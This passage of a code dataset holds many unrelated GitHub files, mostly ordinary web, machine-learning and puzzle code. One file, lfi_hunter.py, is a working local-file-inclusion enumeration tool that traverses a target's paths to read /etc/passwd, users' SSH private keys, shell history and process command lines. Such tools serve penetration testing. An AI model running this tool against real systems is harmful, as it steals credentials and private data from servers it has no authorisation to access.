uvicorn\nfrom fastapi import Depends\nfrom starlette.concurrency import run_until_first_complete\nfrom starlette.websockets import WebSocket\n\nfrom app import app, broadcast\nfrom auth import get_user_from_token\nfrom dependencies import get_user_repository, get_rooms_repo\nfrom schema import RoomDTO\n\n\n@app.get(\"/api/rooms\", response_model=List[RoomDTO])\nasync def get_rooms(\n        user=Depends(get_user_from_token),\n        rooms_repository=Depends(get_rooms_repo),\n        repository=Depends(get_user_repository)\n):\n    user = repository.get_by_login(login=user)\n    if not user:\n        raise Exception()\n    return await rooms_repository.get_all()\n\n\nasync def events_ws_receiver(websocket, channel: str):\n    async for message in websocket.iter_text():\n        await broadcast.publish(channel=channel, message=message)\n\n\nasync def events_ws_sender(websocket, channel: str):\n    async with broadcast.subscribe(channel=channel) as subscriber:\n        async for event in subscriber:\n            await websocket.send_text(event.message)\n\n\n@app.websocket(\"/{channel_id}\")\nasync def websocket_endpoint(websocket: WebSocket, channel_id: str):\n    await websocket.accept()\n    await run_until_first_complete(\n        (events_ws_receiver, {\"websocket\": websocket, \"channel\": channel_id}),\n        (events_ws_sender, {\"websocket\": websocket, \"channel\": channel_id}),\n    )\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n","repo_name":"StephanYorchenko/health-manager-back","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71283613165","text":"#%%\ndef openInput():\n    with open('input.txt') as f:\n        return f.read()\n\nclass House():\n    def __init__(self, x, y) -> None:\n        self.x = x\n        self.y = y\n        self.gifts = 0\n    \n    def addGift(self):\n        self.gifts += 1\n\nclass Houses():\n    def __init__(self) -> None:\n        self.houses: list[House] = []\n\n    def addHouse(self, house: House):\n        self.houses.append(house)\n\n    def getHouse(self, x, y) -> House:  # returns a House (the annotation previously said bool)\n        for house in self.houses:\n            if house.x == x and house.y == y:\n                return house\n        new_house = House(x,y)\n        self.houses.append(new_house)\n        return new_house\n\ndef move(x, y, cmd):\n    if cmd == '<':\n        x -= 1\n    elif cmd == '>':\n        x += 1\n    elif cmd == '^':\n        y += 1\n    elif cmd == 'v':\n        y -= 1\n    return x, y\n\n\nline = openInput()\nhouses = Houses()\n\n# first house\nx, y = 0, 0\nhouse = 
houses.getHouse(x,y)\nhouse.addGift()\n\n# the rest\nfor cmd in line:\n    x, y = move(x, y, cmd)\n    house = houses.getHouse(x,y)\n    house.addGift()\n    # print(f'added gift at {x=}, {y=}')\n\nprint(len(houses.houses))\n\n# %%\n","repo_name":"jrkell/advent-of-code","sub_path":"2015/day-3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12313997145","text":"import torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom math import sqrt as sqrt\nfrom itertools import product as product\n\n\nclass PriorBox(object):\n    \"\"\"Compute priorbox coordinates in center-offset form for each source\n    feature map. Generates the predefined anchor boxes on each feature map.\n    Note:\n    This 'layer' has changed between versions of the original SSD\n    paper, so we include both versions, but note v2 is the most tested and most\n    recent version of the paper.\n\n    \"\"\"\n    def __init__(self, cfg):\n        super(PriorBox, self).__init__()\n        self.image_size = cfg['min_dim'] # input image size for RFBNet, assumed to be 512 here\n        # number of priors for feature map location (the 300 input has 6 feature maps, while 512 has 7)\n        self.num_priors = len(cfg['aspect_ratios']) # predefined anchor aspect-ratio list per feature map, matching the number of detection branches\n        self.variance = cfg['variance'] or [0.1]\n        self.feature_maps = cfg['feature_maps'] # sizes of the feature maps in the feature pyramid\n        self.min_sizes = cfg['min_sizes'] # short side of the predefined anchor scales; deeper layers have larger receptive fields, so they are assigned larger anchors\n        # How are the 6 default bboxes defined in SSD? 2:1 + 1:2 + 1:3 + 3:1 + two 1:1 anchors,\n        # but SSD defines one anchor at sqrt(2) scale; max_sizes is similar, though not strictly equivalent\n        self.max_sizes = cfg['max_sizes'] # long side of the predefined anchor scales\n        self.steps = cfg['steps'] # stride of each detection feature map branch (i.e. the downscaling factor relative to the input)\n        self.aspect_ratios = cfg['aspect_ratios'] # 6/7 predefined anchors per pixel of each feature map\n        self.clip = cfg['clip'] # coordinate clipping\n        for v in self.variance:\n            if v <= 0:\n                raise ValueError('Variances must be greater than 0')\n\n    def forward(self):\n        mean = [] # holds the predefined anchors of all feature maps\n        for k, f in enumerate(self.feature_maps): # for each detection branch of the feature pyramid, sample dense anchors at every pixel of its feature map\n            for i, j in product(range(f), repeat=2): # the Cartesian product of range(f) with itself yields all 2D index pairs for dense anchor sampling\n                f_k = self.image_size / self.steps[k] # feature map size of the current detection branch\n                cx = (j + 0.5) / f_k # normalized anchor center coordinate cx of the current branch\n                cy = (i + 0.5) / f_k # the three steps above map a feature-map position to the normalized original image, as floats\n\n\n                s_k = self.min_sizes[k]/self.image_size # normalized min_size of the anchors of the current branch\n                mean += [cx, cy, s_k, s_k] # add the first anchor, 1:1 aspect ratio\n\n                # aspect_ratio: 1\n                # rel size: sqrt(s_k * s_(k+1))\n                s_k_prime = sqrt(s_k * (self.max_sizes[k]/self.image_size)) #sqrt(min_sizes[k]*max_sizes[k]/(512*512))\n                mean += [cx, cy, s_k_prime, s_k_prime] # add the second anchor, 1:1 aspect ratio at a different scale from the first, matching SSD\n\n                # rest of aspect ratios\n                for ar in self.aspect_ratios[k]: # loop over the elements of the current aspect_ratio list, whether it is [2] or [2,3]\n                    mean += [cx, cy, s_k*sqrt(ar), s_k/sqrt(ar)] # for [2,3] this generates 2:1 and 3:1 anchors; for [2] only a 2:1 anchor\n                    mean += [cx, cy, s_k/sqrt(ar), s_k*sqrt(ar)] # for [2,3] this generates 1:2 and 1:3 anchors; for [2] only a 1:2 anchor\n\n        # Summary:\n        # 1. Each pixel of each detection feature map gets 6/7 anchors with aspect ratios 2:1 + 1:2 + 1:3 + 3:1 + 1:1 + 1:1, where the two 1:1 anchors differ in scale;\n        # 2. This still matches SSD strictly: the anchor scale per feature map is unique (the 2:1 + 1:2 + 1:3 + 3:1 + 1:1 anchors share the same scale, i.e. equal area), only the last 1:1 anchor is slightly larger;\n        # 3. All predefined anchors of all scales and aspect ratios on all feature maps are stored in mean;\n\n        # back to torch land\n        output = torch.Tensor(mean).view(-1, 4) # reshape-like operation to regularize the output\n        if self.clip:\n            output.clamp_(max=1, min=0) # clamp the float coordinates into [0, 1]\n        return 
output\n","repo_name":"2585157341/RFBNet-master_Chinese_note","sub_path":"layers/functions/prior_box.py","file_name":"prior_box.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"25409237424","text":"from multiprocessing import Pool\nimport requests\nimport argparse\nimport signal\nimport re\n\nclass LFI_Hunter():\n def __init__(self,url,file,lfi,pid,output_file,threads,header,cookie,user_agent,proxy):\n self.url = url\n self.file = file\n self.lfi = lfi\n self.pid = pid\n self.output_file = output_file\n self.check = self.size_check()\n self.threads = threads\n self.header = header\n self.cookie = cookie\n self.user_agent = user_agent\n self.proxy = proxy\n\n self.headers,self.proxy_set = self.create_headers()\n self.set_processes_wordlist()\n self.set_processes_procs()\n self.get_history()\n self.get_keys()\n\n def create_headers(self):\n headers = {\n \"Connection\":\"close\"\n }\n\n proxy_set = {}\n\n if args.a:\n headers[\"User-Agent\"] = self.user_agent\n\n if args.p:\n proxy_set = {\n \"http\": \"http://\" + self.proxy\n }\n \n if args.c:\n headers['Cookie'] = self.cookie\n\n if args.H:\n header_list = self.header.split(': ')\n list_length = len(header_list) - 1 \n for each_header in range(0,list_length):\n headers[header_list[each_header]] = header_list[each_header + 1]\n\n return headers,proxy_set\n \n def size_check(self):\n requests.packages.urllib3.disable_warnings()\n if args.o:\n file_write = open(self.output_file,\"w\")\n file_write.close()\n\n check = self.url + self.lfi + \"/9fX1SxbT61qUDQKjpDWo8ApV3YTVLpz5ThM3wJ6XOqlaz\"\n req_lfi = requests.get(check, allow_redirects = False, verify=False)\n page_size = len(req_lfi.text)\n\n return page_size\n\n def write_output(self,line1,line2,line3):\n print(line1)\n print(line2)\n print(line3)\n out_file = open(self.output_file,'a')\n out_file.write(line1)\n out_file.write(\"\\n\")\n out_file.write(line2)\n out_file.write(line3)\n out_file.write(\"\\n\")\n out_file.close()\n\n def get_keys(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for SSH keys for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.ssh/id_rsa\"\n req_ssh = requests.get(ssh_payload, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mSSH Keys for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No SSH keys found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def get_history(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for history files for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.bash_history\"\n req_ssh = requests.get(ssh_payload, 
headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mHistory File for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No history file found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def set_processes_wordlist(self):\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n with open(self.file,'r') as wordlist_file: \n for each_word in wordlist_file: \n wordlist.append(each_word.rstrip())\n\n try:\n start = pool.map_async(self.lfihunt,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def set_processes_procs(self):\n print(\"Searching for running processes in /proc/$(PID)/cmdline\")\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n for each_pid in range(0,int(self.pid)): \n wordlist.append(each_pid)\n\n try:\n start = pool.map_async(self.get_procs,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def get_procs(self,each_pid):\n requests.packages.urllib3.disable_warnings()\n process = self.url + self.lfi + \"/proc/\" + str(each_pid) + \"/cmdline\"\n req_proc = requests.get(process, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n if len(req_proc.text) > self.check:\n line1 = \"Process: \\x1b[6;30;42m/proc/\" + str(each_pid) + \"/cmdline\\x1b[0m\"\n line2 = \"\\n\" + req_proc.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n def lfihunt(self,each_line):\n requests.packages.urllib3.disable_warnings() \n req_lfi = requests.get(self.url + self.lfi + each_line, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n\n if len(req_lfi.text) > self.check:\n line1 = \"File: \\x1b[6;30;42m\" + each_line + \"\\x1b[0m\"\n line2 = \"\\n\" + req_lfi.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='LFI Enumeration Tool')\n parser.add_argument('-u', metavar='', help='Example: -u http://lfi.location/?parameter=', required=True)\n parser.add_argument('-w', metavar='',help=\"Example: -w unix.txt\", required=True)\n parser.add_argument('-l', metavar='',help=\"Example: -l ../../../../../\", required=True)\n parser.add_argument('-pid', metavar='',default='1000',help=\"Default is 1000. Example: -pid 2000\", required=False)\n parser.add_argument('-o', metavar='',help=\"Example: -o output.txt\", required=False)\n parser.add_argument('-t', metavar='',default=\"10\",help=\"Example: -t 100. Default 10\", required=False)\n parser.add_argument('-H', metavar='
        ',help=\"Example -H 'Parameter: Value\", required=False)\n parser.add_argument('-c', metavar='',help=\"Example -c 'Cookie Value\", required=False)\n parser.add_argument('-a', metavar='',help=\"Example: -a Linux\", required=False)\n parser.add_argument('-p', metavar='',help=\"Example: -p 127.0.0.1:8080\", required=False)\n args = parser.parse_args()\n \n try:\n LFI_Hunter(args.u,args.w,args.l,args.pid,args.o,args.t,args.H,args.c,args.a,args.p)\n except KeyboardInterrupt:\n print(\"\\nBye Bye!\")\n exit()","repo_name":"hadrian3689/lfi_hunter","sub_path":"lfi_hunter.py","file_name":"lfi_hunter.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25435324945","text":"import requests\r\nimport zipfile\r\nimport pandas as pd\r\nimport io\r\n\r\n# repository_url = \"https://github.com/AustinWalsh/Datasets-COVID-19/archive/refs/heads/master.zip\"\r\n# csv_file_name = \"NYT-us-counties.csv\"\r\n\r\nrepository_url = input(\"Please enter the repository zip URL: \")\r\ncsv_file_name = input(\"Please enter the csv file name to search: \")\r\n\r\nzip_url = repository_url\r\n\r\ndef getRepoAndCSV():\r\n response = requests.get(zip_url)\r\n df = None\r\n if response.status_code == 200:\r\n with zipfile.ZipFile(io.BytesIO(response.content)) as zip_ref:\r\n for file_info in zip_ref.infolist():\r\n if csv_file_name in file_info.filename:\r\n with zip_ref.open(file_info) as csv_file:\r\n df = pd.read_csv(csv_file)\r\n break\r\n\r\n if df is not None:\r\n print(\"CSV loaded successfully...\")\r\n print(df)\r\n else:\r\n print(\"CSV could not be loaded\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Running script....\")\r\n getRepoAndCSV()","repo_name":"Harrylever/dataset-mining-python","sub_path":"main-2.py","file_name":"main-2.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40514504613","text":"from rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\nfrom Auth.models import (\n User, \n Userprofile, \n AuthUser, \n Userjwttoken, \n Firebasetoken,\n Userauthlist\n )\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n\n # Add custom claims\n token['uuid'] = user.u_uuid.hex()\n #token['id'] = user.u_id\n #token['pw'] = user.u_pw\n return token\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = [ \n 'u_uid',\n 'u_uuid',\n 'u_grade',\n 'u_id',\n 'u_pw',\n 'u_phone',\n 'u_sex',\n 'u_mainpic',\n 'u_point',\n 'u_emailnotify',\n 'u_smsnotify',\n 'u_pushnotify',\n 'u_registerdate',\n #'u_withdrawaldate',\n 'u_lastlogin',\n 'u_introcode',\n 'u_appversion']\n\nclass UserprofileSerializer(serializers.ModelSerializer):\n class Meta:\n model = Userprofile\n fields = [ \n 'up_useruuid',\n 'up_name',\n 'up_sex',\n 'up_birth',\n 'up_height',\n 'up_body',\n 'up_edu',\n 'up_eduname',\n 'up_live',\n 'up_religion',\n 'up_smoke',\n 'up_alcohol',\n 'up_nickname',\n 'up_selfintro',\n 'up_character',\n 'up_requirepic',\n 'up_extrapic'\n ]\n\nclass AuthUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = AuthUser\n fields = [\n 'password',\n 'last_login',\n 'is_superuser',\n 'username',\n 'first_name',\n 'last_name',\n 'email',\n 'is_staff',\n 'is_active',\n 'date_joined'\n ]\n\nclass 
UserjwttokenSerializer(serializers.ModelSerializer):\n class Meta:\n model = Userjwttoken\n fields = [\n 'ujt_key',\n 'ujt_useruuid',\n ]\n\nclass FirebasetokenSerializer(serializers.ModelSerializer):\n class Meta:\n model = Firebasetoken\n fields = [ 'fbt_useruuid',\n 'fbt_usertoken',\n 'fbt_generdate']\n\nclass UserauthlistSerializer(serializers.ModelSerializer):\n class Meta:\n model = Userauthlist\n fields = [ 'ual_useruuid',\n 'ual_type',\n 'ual_require',\n 'ual_confirm',\n 'ual_return',\n 'ual_image'\n ]","repo_name":"strsu/Django_PartyApp","sub_path":"Auth/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73852790763","text":"import sys\ninput = sys.stdin.readline\n\nif __name__ == \"__main__\":\n num = int(input())\n count = 0\n for i in range(1, num+1):\n nums = list(map(int, str(i)))\n if i < 100:\n count += 1\n elif nums[0]-nums[1] == nums[1]-nums[2]:\n count += 1\n print(count)","repo_name":"HyunwooKoh/CodingTest","sub_path":"baekjoon/silver4/sol_1065.py","file_name":"sol_1065.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12296563328","text":"# -*- coding: iso-8859-15 -*-\nimport os.path\n\nimport jinja2\n\nfrom utils.utils import secondsFrom70s, getDelta\n\n\n# http://stackoverflow.com/a/18900930\n_js_escapes = {\n '\\\\': '\\\\u005C',\n '\\'': '\\\\u0027',\n '\"': '\\\\u0022',\n '>': '\\\\u003E',\n '<': '\\\\u003C',\n '&': '\\\\u0026',\n '=': '\\\\u003D',\n '-': '\\\\u002D',\n ';': '\\\\u003B',\n u'\\u2028': '\\\\u2028',\n u'\\u2029': '\\\\u2029'\n}\n# Escape every ASCII character with a value less than 32.\n_js_escapes.update(('%c' % z, '\\\\u%04X' % z) for z in xrange(32))\ndef jinja2_escapejs_filter(value):\n retval = []\n for letter in value:\n if _js_escapes.has_key(letter):\n retval.append(_js_escapes[letter])\n else:\n retval.append(letter)\n\n return jinja2.Markup(\"\".join(retval))\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(\n os.path.join(os.path.dirname(__file__), './templates/')\n )\n)\nJINJA_ENVIRONMENT.filters['from70s'] = secondsFrom70s\nJINJA_ENVIRONMENT.filters['delta'] = getDelta #\"\"\"\nJINJA_ENVIRONMENT.filters['escapejs'] = jinja2_escapejs_filter\n \nCHATS = {\n 'main': 'Global', \n 'book': 'Kirjat', \n 'games': 'Pelit' \n}","repo_name":"soakoak/PythonChat","sub_path":"src/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17760074302","text":"# %% [markdown]\n# Testing the functionality of Credit_Underwriter class, including visuals.\n#\n# Note: Yahoo finance only provides options data for US entities.\n\nfrom ins_mat.special.credit import risk, credit_module\n\nimport pandas as pd\nimport numpy as np\nimport yfinance as yf\nimport datetime as dt\n\n\ndef yf_risk_load(yf_ticker_name: str):\n '''\n Load specified risk tickers from yfinance library.\n '''\n ticker = yf.Ticker(yf_ticker_name)\n\n # Download 3 years of history\n end_date = dt.datetime.today()\n start_date = dt.datetime(year=end_date.year - 3, month=1, day=1)\n\n dload = ticker.history(start=start_date, end=end_date)\n\n # Balance sheet attributes for the risk\n try:\n assets = ticker.balance_sheet.loc['Current Assets'].iloc[0]\n liabilities = 
ticker.balance_sheet.loc['Current Debt'].iloc[0]\n except KeyError:\n assets = ticker.balance_sheet.loc['Total Assets'].iloc[0]\n liabilities = ticker.balance_sheet.loc['Total Debt'].iloc[0]\n shares_issued = ticker.balance_sheet.loc['Share Issued'].iloc[0]\n\n # Option prices (optimize for lowest volatility)\n options = pd.DataFrame()\n\n # Get expiry dates\n expiry_dates = ticker.options\n\n # Filter for expiry dates not immediate, so we look at least 1 month from now\n exp_date_filter = end_date + dt.timedelta(weeks=52/12)\n\n for T in expiry_dates:\n if dt.datetime.strptime(T, '%Y-%m-%d') < exp_date_filter:\n continue\n\n cur_T_options = ticker.option_chain(T)\n cur_T_options = pd.concat([cur_T_options.calls, cur_T_options.puts], ignore_index=True)\n cur_T_options['expiry'] = T\n options = pd.concat([options, cur_T_options], ignore_index=True)\n\n # Odd issue that yields wrong expiration dates so add 1 day to correct\n options['expiry'] = pd.to_datetime(options['expiry']) + dt.timedelta(days=1)\n options['duration'] = ((options['expiry']) - end_date).dt.days / 365\n\n # Labeling call and puts\n options['is_call'] = options['contractSymbol'].str[4:].apply(lambda symb: 'C' in symb)\n\n # Use the mid-point of price as strike, while also ensuring correct data-type for bid, as, strike\n options[['bid', 'ask', 'strike']] = options[['bid', 'ask', 'strike']].apply(pd.to_numeric)\n options['price'] = options[['bid', 'ask']].mean(axis=1)\n\n # Attain the option with the highest trade volume - measure of credibility\n options = options.sort_values(by='openInterest', ascending=False)\n\n # Obtain the option parameters\n opt_price = options['price'].iloc[0]\n opt_type = 'call' if options['is_call'].iloc[0] else 'put'\n opt_maturity = options['duration'].iloc[0]\n opt_strike = options['strike'].iloc[0]\n\n opt_implied = options['impliedVolatility'].iloc[0]\n\n yf_risk = risk(name=yf_ticker_name,\n ticker=yf_ticker_name,\n sector=ticker.info['sector'],\n shares_issued=shares_issued,\n market_history=dload['Close'].values,\n option_price=opt_price,\n option_strike=opt_strike,\n option_type=opt_type,\n option_maturity=opt_maturity,\n currency=ticker.info['currency'],\n assets=assets,\n liabilities=liabilities,\n dividends=dload['Dividends'].iloc[0]\n )\n\n return (yf_risk, opt_implied)\n\n\ndef credit_risk_generation(yf_risks, limit=10e6, debt_maturity=1, risk_free_rate=0.03, impl_vol_overriders=None):\n '''\n Run the credit risk pipeline from the chosen list of yf_risks.\n '''\n\n uw = credit_module(yf_risks, limit=limit, debt_maturity=debt_maturity, r=risk_free_rate)\n\n for i in range(len(yf_risks)):\n rsk = yf_risks[i]\n ovr = impl_vol_overriders[i]\n\n print(f'Solving for {rsk.name}')\n print('Attaining implied asset volatility...')\n uw.calculate_implied_volatility(rsk, override=ovr)\n\n print('Attaining sharpe ratio')\n uw.calculate_sharpe_ratio(rsk)\n\n print('Generating rates')\n uw.generate_rate(rsk, use_rn=False)\n\n return uw\n\n\ndef main_test():\n names = ['BAC', 'IBM', 'MSFT', 'ORCL', 'AAPL', 'PG', 'KO']\n portfolio_lst = []\n list_implied_vol = []\n\n for s in names:\n rsk, implV = yf_risk_load(s)\n portfolio_lst.append(rsk)\n list_implied_vol.append(implV)\n\n uw = credit_risk_generation(portfolio_lst, risk_free_rate=0.03, impl_vol_overriders=list_implied_vol)\n\n # Print some results:\n ac_probs = [uw.ac_default_probability[s] for s in names]\n rn_probs = [uw.rn_default_probability[s] for s in names]\n e_vols = [uw.equity_volatilities[s] for s in names]\n a_vols = 
[uw.asset_volatilities[s] for s in names]\n sharpe_ratios = [uw.sharpe_ratios[s] for s in names]\n prems = [uw.premiums[s] for s in names]\n\n results = pd.DataFrame({\n 'Risk': names,\n 'Implied_equity_volatility': e_vols,\n 'Implied_asset_volatility': a_vols,\n 'Default_probs_rn': rn_probs,\n 'Default_probs_act': ac_probs,\n 'Sharpe': sharpe_ratios,\n 'Premiums': prems\n })\n\n print(results)\n\n\nif __name__ == \"__main__\":\n main_test()\n","repo_name":"Alex-zh95/insurance-mathematics","sub_path":"ins_mat/tests/credit_test.py","file_name":"credit_test.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23115474420","text":"import os\nimport numpy as np\nimport shutil\n\nRATIO = 0.5\n\nprint(\"\\n ---- Dataset Split Started ---- \\n\")\n\nvehicle_list = os.listdir(os.path.join(os.getcwd(), \"images\"))\nimages_path = os.path.join(os.getcwd(), \"images\")\nmodel_images_path = os.path.join(os.getcwd(), \"classification_model/images\")\n\nif not os.path.isdir(model_images_path):\n os.mkdir(model_images_path)\n\nfor vehicle in vehicle_list:\n\n print(f\"Splitting the dataset of: {vehicle}\")\n\n os.makedirs(model_images_path + '/train/' + vehicle)\n os.makedirs(model_images_path + '/test/' + vehicle)\n os.makedirs(model_images_path + '/validate/' + vehicle)\n\n source = images_path + '/' + vehicle + '/duplicate_checked'\n\n if os.path.exists(source):\n allFileNames = os.listdir(source)\n else:\n continue\n\n np.random.shuffle(allFileNames)\n\n train_FileNames, remaining_FileNames = np.split(np.array(allFileNames),\n [int(len(allFileNames) * (1 - RATIO))])\n\n train_FileNames = [source+'/' + name for name in train_FileNames.tolist()]\n\n for name in train_FileNames:\n shutil.copy(name, model_images_path + '/train/' + vehicle)\n\n test_file_names, validate_file_names = np.split(np.array(remaining_FileNames),\n [int(len(remaining_FileNames) * (1 - RATIO))])\n\n test_file_names = [source+'/' + name for name in test_file_names.tolist()]\n validate_file_names = [source+'/' + name for name in validate_file_names.tolist()]\n\n for name in test_file_names:\n shutil.copy(name, model_images_path + '/test/' + vehicle)\n\n for name in validate_file_names:\n shutil.copy(name, model_images_path + '/validate/' + vehicle)\n\nprint(\"\\n ---- Dataset Split Completed ---- \")","repo_name":"donheshanthaka/Price-Finder-Deep-Learning-Model","sub_path":"web_scraper_for_image_collection/dataset_split.py","file_name":"dataset_split.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"4301113987","text":"import random\nimport sys\nsys.path.append('..')\nfrom common import board\n\n\ndef make_move(the_board, color):\n \"\"\"\n Returns a random move from the list of possible ones\n :return: (int, int)\n \"\"\"\n color = board.Board.WHITE if color == 'white' else board.Board.BLACK\n legal_moves = the_board.legal_moves(color)\n\n return random.choice(legal_moves) if len(legal_moves) > 0 else (-1, -1)\n\n\nif __name__ == '__main__':\n b = board.from_file(sys.argv[1])\n f = open('move.txt', 'w')\n f.write('%d,%d' % make_move(b, sys.argv[2]))\n f.close()\n","repo_name":"patrick-vieira/INF01048_T2_Othello","sub_path":"randomplayer/randomplayer.py","file_name":"randomplayer.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} 
+{"seq_id":"38447481807","text":"n = int(input())\nc = list(map(int, input().split()))\nc.sort()\nans = 1\nL = (10 ** 9 + 7)\nfor i, v in enumerate(c):\n ans *= (v - i) % L\n ans = ans % L\n\nprint(ans % L)\n","repo_name":"ET0024/AtCoder","sub_path":"ABC201~300/ABC209/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5572262652","text":"# -*- coding: utf-8 -*-\n# vim: sw=4:ts=4:expandtab\n\"\"\"\n pipe2py.modules.pipeurlbuilder\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n http://pipes.yahoo.com/pipes/docs?doc=url#URLBuilder\n\"\"\"\n\nimport urllib\nfrom itertools import imap, ifilter, starmap\nfrom . import _get_broadcast_funcs as get_funcs, get_dispatch_funcs, get_splits\nfrom pipe2py.lib import utils\nfrom pipe2py.lib.utils import combine_dicts as cdicts\n\nopts = {'parse': False}\n\n\n@utils.memoize(utils.timeout)\ndef parse_result(params, paths, base):\n url = '%s/' % base if not base.endswith('/') else base\n url += '/'.join(imap(str, ifilter(None, paths)))\n url = url.rstrip('/')\n url = utils.url_quote(url) # Ensure url is valid\n url += '?%s' % urllib.urlencode(params) if params and url else ''\n return url\n\n\ndef pipe_urlbuilder(context=None, _INPUT=None, conf=None, **kwargs):\n \"\"\"A url module that builds a url. Loopable.\n\n Parameters\n ----------\n context : pipe2py.Context object\n _INPUT : pipeforever pipe or an iterable of items or fields\n conf : {\n 'PARAM': [\n {'key': {'value': <'order'>}, 'value': {'value': <'desc'>}},\n {'key': {'value': <'page'>}, 'value': {'value': <'2'>}}\n ]\n 'PATH': {'type': 'text', 'value': <''>},\n 'BASE': {'type': 'text', 'value': <'http://site.com/feed.xml'>},\n }\n\n Yields\n ------\n _OUTPUT : url\n \"\"\"\n pkwargs = cdicts(opts, kwargs)\n get_params = get_funcs(conf.get('PARAM', []), **kwargs)[0]\n get_paths = get_funcs(conf.get('PATH', []), **pkwargs)[0]\n get_base = get_funcs(conf['BASE'], listize=False, **pkwargs)[0]\n parse_params = utils.parse_params\n splits = get_splits(_INPUT, funcs=[get_params, get_paths, get_base])\n parsed = utils.dispatch(splits, *get_dispatch_funcs('pass', parse_params))\n _OUTPUT = starmap(parse_result, parsed)\n return 